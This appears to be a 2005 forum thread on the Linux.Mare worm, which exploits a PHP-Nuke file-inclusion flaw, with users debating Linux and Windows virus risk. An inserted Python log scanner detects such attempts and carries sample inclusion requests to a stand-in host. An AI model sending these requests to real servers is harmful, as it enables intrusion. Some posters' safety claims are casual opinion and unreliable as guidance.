Latest Linux virus

Discussion in 'NZ Computing' started by Fred Dagg, Dec 29, 2005.

  1. Fred Dagg

    Fred Dagg Guest

    This latest worm can give someone else arbitrary control of your Linux
    computer.

    Linux.Mare is a worm that spreads by exploiting the PHP-Nuke
    "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm,
    which has back door capabilities, also downloads and executes remote
    files on the compromised computer.

    http://www.symantec.com/avcenter/venc/data/linux.mare.html
    Fred Dagg, Dec 29, 2005
    #1
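A detection sketch for the request pattern named in the post above, added here as an example and not part of the original thread: it scans web-server access logs (combined log format assumed) for requests that set the `phpbb_root_path` parameter and classifies the decoded value. The log lines, paths and hosts are constructed, and the check assumes clients never legitimately supply this parameter.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

PARAM = "phpbb_root_path"  # parameter named in the advisory quoted above

# Combined log format: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# Any "scheme://" prefix means the include path points off-host.
REMOTE_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.I)

# Constructed sample input (documentation IP ranges, .invalid host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Dec/2005:10:01:02 +1300] "GET /viewtopic.php?t=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [29/Dec/2005:10:02:11 +1300] "GET /forum/page.php?phpbb_root_path=http://files.example.invalid/a.txt? HTTP/1.0" 200 312 "-" "-"',
    '198.51.100.7 - - [29/Dec/2005:10:02:12 +1300] "GET /nuke/page.php?phpbb_root_path=%2568ttp%253A%252F%252Ffiles.example.invalid%252Fa.txt HTTP/1.0" 404 209 "-" "-"',
    '203.0.113.5 - - [29/Dec/2005:10:05:40 +1300] "GET /forum/page.php?x=1&phpbb_root_path=%2e%2e%2f%2e%2e%2fincludes HTTP/1.1" 200 880 "-" "-"',
]


def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding (bounded) so %2568ttp is seen as http."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value):
    """Return 'remote-url', 'local-path' or 'other' for a decoded value."""
    v = value.strip()
    if REMOTE_RE.match(v):
        return "remote-url"
    if "../" in v or "..\\" in v or v.startswith("/"):
        return "local-path"
    return "other"


def scan(lines):
    """Return one finding per request that supplies PARAM in its query string."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        query = urlsplit(m["target"]).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            if name.lower() != PARAM:
                continue
            value = fully_unquote(raw)  # parse_qsl already decoded once
            findings.append({
                "line": lineno, "host": m["host"], "time": m["time"],
                "kind": classify(value), "value": value,
                # 2xx: the targeted script exists and answered; triage first
                "served": m["status"].startswith("2"),
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["line"], f["host"], f["kind"], f["served"], f["value"])
```

A 2xx status only shows that the requested script exists and responded, not that an inclusion succeeded, so treat `served` as a triage hint.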

  2. Fred Dagg

    Shane Guest

    On Fri, 30 Dec 2005 10:57:27 +1300, Fred Dagg wrote:

    >
    > This latest worm can give someone else arbitrary control of your Linux
    > computer.
    >
    > Linux.Mare is a worm that spreads by exploiting the PHP-Nuke
    > "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm, which
    > has back door capabilities, also downloads and executes remote files on
    > the compromised computer.
    >
    > http://www.symantec.com/avcenter/venc/data/linux.mare.html


    Heh.. requires the computer to be running a webserver, php, and an
    unpatched version of that abomination known as phpbb.
    Perhaps, though, you would prefer to be running *any* version of Windows
    currently vulnerable to the attack outlined below:
    http://www.securityfocus.com/brief/89

    A previously unknown vulnerability in the Microsoft Windows graphics rendering
    engine is being exploited by several malicious Web sites to infect
    visitors' systems, security experts said on Wednesday.

    The vulnerability can be triggered remotely and gives the attacker full system
    privileges, according to technical descriptions of the issue. However, in
    a security bulletin released late Wednesday, Microsoft maintained that
    only local user privileges could be gained through the vulnerability. In
    the last 24 hours, three different Windows Meta Files (WMFs) have been
    detected trying to use the vulnerability to spread, according to antivirus
    firm F-Secure.

    "Do note that it's really easy to get burned by this exploit if you're analyzing
    it under Windows," Mikko Hyppönen, chief research officer for F-Secure
    said in a blog posting. "All you need to do is to access an infected web
    site with IE (Internet Explorer) or view a folder with infected files with
    the Windows Explorer."


    Google Desktop users have to be particularly careful as the search giant's software
    indexes any downloaded image file, an action that will cause the exploit
    to immediately execute, according to security researchers. A Microsoft
    spokesperson said the company is currently investigating the reports.

    UPDATE: This brief has been updated to reflect information published by Microsoft
    in a Security Bulletin released late on Wednesday. The original brief was
    published about noon PST on Wednesday, and the updated version at 6:30 PST
    on Thursday.



    Actually, this is incorrect; I have also read that Firefox users are not
    safe from this attack either:
    http://news.zdnet.com/2100-1009_22-6011406.html?tag=nl.e589

    A new Trojan horse program was infecting PCs on Wednesday, exploiting a hole in
    Windows systems to sneak onto computers, then dropping adware or spyware
    or turning them into zombies, according to several Internet security
    companies.
    The Trojan, dubbed Exploit-WMF (Windows Meta File), was rated a category
    2 level risk, meaning it had the potential to continue to spread, said
    Dave Cole, director of security response at Symantec. The exploit "is
    misusing a function in the WMF library in Windows," dropping onto the
    machine a downloader Trojan "that pulls down its big brother, a more
    sophisticated Trojan" from a server on the Internet, he said. "Then it
    might try to pull down adware, spyware or a bot program," that can turn
    the computer into a zombie to be used for attacking other machines or
    sending spam, or just leave a hole on the computer through which
    sensitive data could be stolen, Cole said. Kaspersky Lab rated the
    vulnerability "highly critical" and predicted that "new modifications of
    these programs may well appear in the near future." The WMF vulnerability
    affects computers running Windows XP with Service Pack 1 and Service Pack
    2, as well as Windows Server 2003 with Service Pack 0 and Service Pack 1.
    It can be exploited when an Internet Explorer user, or Firefox user under
    certain circumstances, visits a Web site that has malicious code on it or
    when a user previews .wmf format files with Windows Explorer, Kaspersky
    said in a statement. The WMF library allows the computer to handle
    particular image types of Windows machines, Cole said. There is no patch
    for it yet from Microsoft, although antivirus vendors had released
    software to help protect against it, he said. "Microsoft is investigating
    new public reports of a possible vulnerability in Windows and will
    continue to investigate the reports to help provide additional guidance
    for customers," a Microsoft spokesperson wrote in an e-mail. "Upon
    completion of this investigation, Microsoft will take the appropriate
    action to protect customers, which may include providing a fix through
    the monthly release process or issuing a security advisory, depending on
    customer needs." Windows users can get more information about security
    issues at http://support.microsoft.com/security.

    --
    Reliable source, n.:
    The guy you just met.
    Shane, Dec 29, 2005
    #2

  3. Fred Dagg

    MarkH Guest

    le (S Roby) wrote in
    news:_RZsf.11239$:

    > In article <>, Fred Dagg
    > <> wrote:
    >>
    >>This latest worm can give someone else arbitrary control of your Linux
    >>computer.
    >>

    >
    >
    > NO NO NO
    > We have been told so many times that Linux doesn't get viruses


    As already pointed out on a previous post:
    "Requires the computer to be running a webserver, php, and an
    unpatched version of that abomination known as phpbb"

    A fully patched Linux system is safe from this worm!

    I feel safer running Linux with no AV program than running Windows XP SP2
    with all the latest patches and the best AV program I can find.



    --
    Mark Heyes (New Zealand)
    See my pics at www.gigatech.co.nz (last updated 5-September-05)
    "The person on the other side was a young woman. Very obviously a
    young woman. There was no possible way she could have been mistaken
    for a young man in any language, especially Braille."
    Maskerade
    MarkH, Dec 29, 2005
    #3
  4. Fred Dagg

    S Roby Guest

    In article <>, Fred Dagg <> wrote:
    >
    >This latest worm can give someone else arbitrary control of your Linux
    >computer.
    >



    NO NO NO
    We have been told so many times that Linux doesn't get viruses
    S Roby, Dec 29, 2005
    #4
  5. Fred Dagg

    shannon Guest

    Fred Dagg wrote:
    > This latest worm can give someone else arbitrary control of your Linux
    > computer.
    >
    > Linux.Mare is a worm that spreads by exploiting the PHP-Nuke
    > "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm,
    > which has back door capabilities, also downloads and executes remote
    > files on the compromised computer.
    >
    > http://www.symantec.com/avcenter/venc/data/linux.mare.html


    What is PHP-Nuke?
    I've never seen it on any of my Linux installs.
    shannon, Dec 30, 2005
    #5
  6. Fred Dagg

    -=rjh=- Guest

    shannon wrote:
    > Fred Dagg wrote:
    >
    >> This latest worm can give someone else arbitrary control of your Linux
    >> computer.
    >>
    >> Linux.Mare is a worm that spreads by exploiting the PHP-Nuke
    >> "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm,
    >> which has back door capabilities, also downloads and executes remote
    >> files on the compromised computer.
    >>
    >> http://www.symantec.com/avcenter/venc/data/linux.mare.html

    >
    >
    > what is php-nuke ?
    > I've never seen it on any of my linux installs.


    PHP-Nuke is a CMS (Content Management System) so is only going to be
    installed by people who plan to use it. I think a number of these CMS
    systems are fairly risky to run, as they aren't always actively
    maintained. The PHP-Nuke vulnerability may not be limited to PHP-Nuke alone.
    -=rjh=-, Dec 30, 2005
    #6
  7. Fred Dagg

    -=rjh=- Guest

    shannon wrote:
    > Fred Dagg wrote:
    >
    >> This latest worm can give someone else arbitrary control of your Linux
    >> computer.
    >>
    >> Linux.Mare is a worm that spreads by exploiting the PHP-Nuke
    >> "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm,
    >> which has back door capabilities, also downloads and executes remote
    >> files on the compromised computer.
    >>
    >> http://www.symantec.com/avcenter/venc/data/linux.mare.html

    >
    >
    > what is php-nuke ?
    > I've never seen it on any of my linux installs.


    Oh, I forgot to mention, PHP-Nuke runs on Windows also. In fact, it may
    even be more common on Windows than Linux.
    -=rjh=-, Dec 30, 2005
    #7
  8. Fred Dagg

    steve Guest

    Fred Dagg wrote:
    > This latest worm can give someone else arbitrary control of your Linux
    > computer.
    >
    > Linux.Mare is a worm that spreads by exploiting the PHP-Nuke
    > "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm,
    > which has back door capabilities, also downloads and executes remote
    > files on the compromised computer.
    >
    > http://www.symantec.com/avcenter/venc/data/linux.mare.html


    So you need to be running a particular flavour of PHP-based BBS software
    with a known vulnerability on a Linux system running a web server.

    Thanks.
    steve, Dec 30, 2005
    #8
  9. Fred Dagg

    steve Guest

    S Roby wrote:
    > In article <>, Fred Dagg <> wrote:
    >
    >>This latest worm can give someone else arbitrary control of your Linux
    >>computer.

    >
    > NO NO NO
    > We have been told so many times that Linux doesn't get viruses


    Have you read the alert?
    steve, Dec 30, 2005
    #9
  10. Fred Dagg

    steve Guest

    MarkH wrote:

    > A fully patched Linux system is safe from this worm!


    Any Linux system not running that flavour of PHP-based BBS software is
    safe from this worm.

    > I feel safer running Linux with no AV program than running Windows XP SP2
    > with all the latest patches and the best AV program I can find.


    I've been running Linux that way for 6 years with no
    viruses......whereas WinXP keeps getting removed from my daughter's
    system and replaced with Linux because that one XP system took as much
    of my time to maintain as the other 4 desktops and one server....which
    run Linux.
    steve, Dec 30, 2005
    #10
  11. Fred Dagg

    shannon Guest

    Re: Latest Linux virus ??

    steve wrote:
    > Fred Dagg wrote:
    >
    >> This latest worm can give someone else arbitrary control of your Linux
    >> computer.
    >>
    >> Linux.Mare is a worm that spreads by exploiting the PHP-Nuke
    >> "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm,
    >> which has back door capabilities, also downloads and executes remote
    >> files on the compromised computer.
    >>
    >> http://www.symantec.com/avcenter/venc/data/linux.mare.html

    >
    >
    > So you need to be running a particular flavour of PHP-based BBS software
    > with a known vulnerability on a Linux system running a web server.
    >
    > Thanks.
    >


    So it's not like one of those Windows viruses that exploit the default
    Windows installation and send themselves to every other Windows system
    with the same vulnerability.

    What a relief !!
    shannon, Dec 30, 2005
    #11
  12. Fred Dagg

    shannon Guest

    S Roby wrote:
    > In article <43b4bc6d$>, steve <> wrote:
    >> MarkH wrote:
    >>
    >>> A fully patched Linux system is safe from this worm!

    >> Any Linux system not running that flavour of PHP-based BBS software is
    >> safe from this worm.
    >>
    >>> I feel safer running Linux with no AV program than running Windows XP SP2
    >>> with all the latest patches and the best AV program I can find.

    >> I've been running Linux that way for 6 years with no
    >> viruses......whereas WinXP keeps getting removed from my daughter's
    >> system and replaced with Linux because that one XP system took as much
    >> of my time to maintain as the other 4 desktops and one server....which
    >> run Linux.
    >>
    >>

    >
    > I've been running Win since '95 WITH NO VIRUSES.


    That's nice for you.
    We can all safely ignore virus protection for Windows then on your
    advice, thanks.
    shannon, Dec 30, 2005
    #12
  13. Fred Dagg

    steve Guest

    Re: Latest Linux virus ??

    shannon wrote:

    > steve wrote:
    >> Fred Dagg wrote:
    >>
    >>> This latest worm can give someone else arbitrary control of your Linux
    >>> computer.
    >>>
    >>> Linux.Mare is a worm that spreads by exploiting the PHP-Nuke
    >>> "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm,
    >>> which has back door capabilities, also downloads and executes remote
    >>> files on the compromised computer.
    >>>
    >>> http://www.symantec.com/avcenter/venc/data/linux.mare.html

    >>
    >>
    >> So you need to be running a particular flavour of PHP-based BBS software
    >> with a known vulnerability on a Linux system running a web server.
    >>
    >> Thanks.

    >
    > So it's not like one of those Windows viruses that exploit the default
    > Windows installation and send themselves to every other Windows system
    > with the same vulnerability.
    >
    > What a relief !!


    Not quite.

    It's a rare situation involving a server application that home users are
    most unlikely to encounter.

    No need to break out the AV software and panic.

    You can if you want, though.
    steve, Dec 31, 2005
    #13
  14. Fred Dagg

    steve Guest

    S Roby wrote:

    > In article <43b4bc6d$>, steve
    > <> wrote:
    >>MarkH wrote:
    >>
    >>> A fully patched Linux system is safe from this worm!

    >>
    >>Any Linux system not running that flavour of PHP-based BBS software is
    >>safe from this worm.
    >>
    >>> I feel safer running Linux with no AV program than running Windows XP
    >>> SP2 with all the latest patches and the best AV program I can find.

    >>
    >>I've been running Linux that way for 6 years with no
    >>viruses......whereas WinXP keeps getting removed from my daughter's
    >>system and replaced with Linux because that one XP system took as much
    >>of my time to maintain as the other 4 desktops and one server....which
    >>run Linux.

    >
    > I've been running Win since '95 WITH NO VIRUSES.


    No AV software and not on XP?

    That's possible.

    But if you're on W2k or XP, without AV software, AND connected to the Net
    24/7 on broadband and using MS IE.....then your claim would be hard to
    believe.
    steve, Dec 31, 2005
    #14
  15. Fred Dagg

    Alhambra Guest

    On Sat, 31 Dec 2005 13:35:34 +1300, steve wrote:

    > S Roby wrote:
    >
    >> In article <43b4bc6d$>, steve
    >> <> wrote:
    >>>MarkH wrote:
    >>>
    >>>> A fully patched Linux system is safe from this worm!
    >>>
    >>>Any Linux system not running that flavour of PHP-based BBS software is
    >>>safe from this worm.
    >>>
    >>>> I feel safer running Linux with no AV program than running Windows XP
    >>>> SP2 with all the latest patches and the best AV program I can find.
    >>>
    >>>I've been running Linux that way for 6 years with no
    >>>viruses......whereas WinXP keeps getting removed from my daughter's
    >>>system and replaced with Linux because that one XP system took as much
    >>>of my time to maintain as the other 4 desktops and one server....which
    >>>run Linux.

    >>
    >> I've been running Win since '95 WITH NO VIRUSES.

    >
    > No AV software and not on XP?
    >
    > That's possible.
    >
    > But if you're on W2k or XP, without AV software, AND connected to the Net
    > 24/7 on broadband and using MS IE.....then your claim would be hard to
    > believe.


    I used to make the same claim until one day I ran a virus and spyware scan.

    Oh dear... :)

    -A
    Alhambra, Dec 31, 2005
    #15
  16. Fred Dagg

    S Roby Guest

    In article <43b4bc6d$>, steve <> wrote:
    >MarkH wrote:
    >
    >> A fully patched Linux system is safe from this worm!

    >
    >Any Linux system not running that flavour of PHP-based BBS software is
    >safe from this worm.
    >
    >> I feel safer running Linux with no AV program than running Windows XP SP2
    >> with all the latest patches and the best AV program I can find.

    >
    >I've been running Linux that way for 6 years with no
    >viruses......whereas WinXP keeps getting removed from my daughter's
    >system and replaced with Linux because that one XP system took as much
    >of my time to maintain as the other 4 desktops and one server....which
    >run Linux.
    >
    >


    I've been running Win since '95 WITH NO VIRUSES.
    S Roby, Dec 31, 2005
    #16
  17. Hi there,

    S Roby wrote:
    > In article <>, Fred Dagg <> wrote:
    >
    >>This latest worm can give someone else arbitrary control of your Linux
    >>computer.

    >
    > NO NO NO
    > We have been told so many times that Linux doesn't get viruses


    Of course it gets virii, it's just much less likely to. It
    depends on your setup and what software is installed on the
    system. Servers might use php, but for the average home user
    php is unlikely to be installed...certainly SuSE 10.0 does
    not install it by default, nor do I need to using my machine
    at home...

    Another poor flame bait attempt...

    --
    Kind regards,

    Chris Wilkinson, Brisbane, Australia.
    Anyone wishing to email me directly can remove the obvious
    spamblocker, and replace it with t p g <dot> c o m <dot> a u
    Chris Wilkinson, Dec 31, 2005
    #17
  18. Fred Dagg

    S Roby Guest


    >> NO NO NO
    >> We have been told so many times that Linux doesn't get viruses

    >
    >Of course it gets virii, it's just much less likely to. It
    >depends on your setup and what software is installed on the
    >system. Servers might use php, but for the average home user
    >php is unlikely to be installed...certainly SuSE 10.0 does
    >not install it by default, nor do I need to using my machine
    >at home...
    >
    >Another poor flame bait attempt...
    >


    No, it was just sarcasm (after all the posts I've seen on this forum that made
    the claim of Lin being virus free)
    S Roby, Dec 31, 2005
    #18
  19. Fred Dagg

    Rob J Guest

    In article <>,
    says...
    > S Roby wrote:
    >
    > > In article <43b4bc6d$>, steve
    > > <> wrote:
    > >>MarkH wrote:
    > >>
    > >>> A fully patched Linux system is safe from this worm!
    > >>
    > >>Any Linux system not running that flavour of PHP-based BBS software is
    > >>safe from this worm.
    > >>
    > >>> I feel safer running Linux with no AV program than running Windows XP
    > >>> SP2 with all the latest patches and the best AV program I can find.
    > >>
    > >>I've been running Linux that way for 6 years with no
    > >>viruses......whereas WinXP keeps getting removed from my daughter's
    > >>system and replaced with Linux because that one XP system took as much
    > >>of my time to maintain as the other 4 desktops and one server....which
    > >>run Linux.

    > >
    > > I've been running Win since '95 WITH NO VIRUSES.

    >
    > No AV software and not on XP?
    >
    > That's possible.
    >
    > But if you're on W2k or XP, without AV software, AND connected to the Net
    > 24/7 on broadband and using MS IE.....then your claim would be hard to
    > believe.


    Bollocks

    There are plenty of viruses around that affect Windows 95/98 systems.
    Rob J, Dec 31, 2005
    #19
  20. Fred Dagg

    steve Guest

    Rob J wrote:

    > In article <>,
    > says...
    >> S Roby wrote:
    >>
    >> > In article <43b4bc6d$>, steve
    >> > <> wrote:
    >> >>MarkH wrote:
    >> >>
    >> >>> A fully patched Linux system is safe from this worm!
    >> >>
    >> >>Any Linux system not running that flavour of PHP-based BBS software is
    >> >>safe from this worm.
    >> >>
    >> >>> I feel safer running Linux with no AV program than running Windows XP
    >> >>> SP2 with all the latest patches and the best AV program I can find.
    >> >>
    >> >>I've been running Linux that way for 6 years with no
    >> >>viruses......whereas WinXP keeps getting removed from my daughter's
    >> >>system and replaced with Linux because that one XP system took as much
    >> >>of my time to maintain as the other 4 desktops and one server....which
    >> >>run Linux.
    >> >
    >> > I've been running Win since '95 WITH NO VIRUSES.

    >>
    >> No AV software and not on XP?
    >>
    >> That's possible.
    >>
    >> But if you're on W2k or XP, without AV software, AND connected to the Net
    >> 24/7 on broadband and using MS IE.....then your claim would be hard to
    >> believe.

    >
    > Bollocks


    Not at all.

    > There are plenty of viruses around that affect Windows 95/98 systems.


    Of course there are. But worms which actively infect W2K and XP systems
    can't infect Win9x as Win9x (normally) has no servers "listening" for
    incoming traffic to service.

    To get a virus on Win9X requires some activity on the part of the user. A
    Win9x user who doesn't use MS IE or Outlook Express and who turns off
    javascript in whatever browser they use and never executes unknown e-mail
    attachments has a pretty good chance of avoiding viruses.
    steve, Dec 31, 2005
    #20
